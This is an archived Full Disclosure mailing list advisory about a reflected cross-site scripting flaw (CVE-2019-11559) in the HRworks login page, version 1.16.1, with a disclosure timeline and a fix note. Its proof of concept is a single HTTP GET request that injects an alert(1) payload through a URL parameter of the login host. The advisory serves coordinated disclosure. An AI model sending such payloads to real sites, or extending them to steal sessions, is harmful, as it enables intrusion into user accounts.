[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] =?utf-8?q?Reflected_XSS_=E2=80=93_HRworks_Login_=28v1=2E16?= =?utf-8?b?LjEp?=
From: Georg Ph E Heise via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2019-09-18 9:51:06
Message-ID: hrQCrKo1hdx11wxj5JgnYKRuJv4QPQQ4CamolgI77D1R69t4nJKPVAaT4nECphjKleKdI2EmCOMOMpqGz9roMmpKZKV1ru8cPS5T9ccO62o= () protonmail ! com
[Download RAW message or body]
# Exploit Title: Reflected XSS – HRworks Login (v1.16.1)
# Vendor Homepage: https://www.hrworks.de
# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions
# Contact: https://twitter.com/gpheheise
# Website: https://www.lufthansa-industry-solutions.com
# Category: webapps
# CVE: CVE-2019-11559
Timeline
26.04.2019 Disclosure to Vendor
29.04.2019 Vendor informed that the issue was remediated
17.09.2019 Publication
1. Description:
The URL parameter of the login page accepts unfiltered parameters that lead to several version of reflected XSS
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11559
2. Proof of Concept:
Vulnerable Source
http://login.hrworks.de
PoC
GET /?re44h"-alert(1)-"bb8rf=1 HTTP/1.1
Host: login.hrworks.de
Accept-Encoding: gzip, deflate
Accept: */*
3. Solution:
As date of publication all versions above 1.16.3 are save to use
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic